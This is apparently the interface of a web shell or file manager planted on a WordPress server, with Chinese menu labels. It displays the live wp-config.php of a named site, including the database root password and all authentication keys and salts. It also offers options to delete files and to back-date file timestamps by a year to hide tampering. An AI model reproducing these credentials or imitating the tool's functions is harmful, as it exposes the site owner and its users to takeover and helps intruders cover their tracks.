文件操作 - wp-config.php
返回文件管理
返回主菜单
删除本文件
文件: /var/www/ltlcompare.com/wp-config.php
编辑文件内容
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'ltlcompare' ); /** Database username */ define( 'DB_USER', 'root' ); /** Database password */ define( 'DB_PASSWORD', 'GpF&1t$!M8' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', '[!C#Fw. } xsUfa/a9h|8Xv7:ZmJ?|U#z _E(8QnJ)XT/Jdub`X2fjV%5,;sr.8m' ); define( 'SECURE_AUTH_KEY', 'MR~:*SL1C[kUlp0LIW1i-qTOE?0T_R=Ehm`O{9U[aJDfzIrI$adD2~I9X-KO/_cI' ); define( 'LOGGED_IN_KEY', 'oqA$kGM@w}@odn/rh~uD$58lek$52qZlxq{iF,t>jPmQ&::Et4!rVozj%GnNWVa|' ); define( 'NONCE_KEY', 'f^s4*{4:8$4}JAU)Uxjw)1vxj[6Hn%A92+cZ+fXWGV;z),WH/$wx-yj].);gRhvW' ); define( 'AUTH_SALT', '#oZ-*-&ckj?i&{(9L#E7}^^#. ?]5OI(u#NdAA*D|9LzoO!+Ko7eXy=!x#z+.J;j' ); define( 'SECURE_AUTH_SALT', 'UvR+I},,1%~=h5 *iIN_K:%Bdb?H5[ANQK7S:@Jv^Q+Fp=#61zGlP6*Zs7/}Q/MZ' ); define( 'LOGGED_IN_SALT', '~I,Nj>FOXa4@HkAvUi}8nFV./uR9`oNcR;(}AjB63b #u)oUTN@ChL~4)N(%bK<D' ); define( 'NONCE_SALT', 'B,rZNZ&c2cK6+9f&O}`Pz[n+/$|*og{NfUc; CtSnu=mOh8{jp}/YU~zf0o<p1q#' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! * * At the installation time, database tables are created with the specified prefix. * Changing this value after WordPress is installed will make your site think * it has not been installed. * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix */ $table_prefix = 'wp_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/ */ define( 'WP_DEBUG', true ); define('WP_DEBUG_LOG', true); define('WP_DEBUG_DISPLAY', true); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
修改文件时间
将文件时间修改为当前时间的前一年
删除文件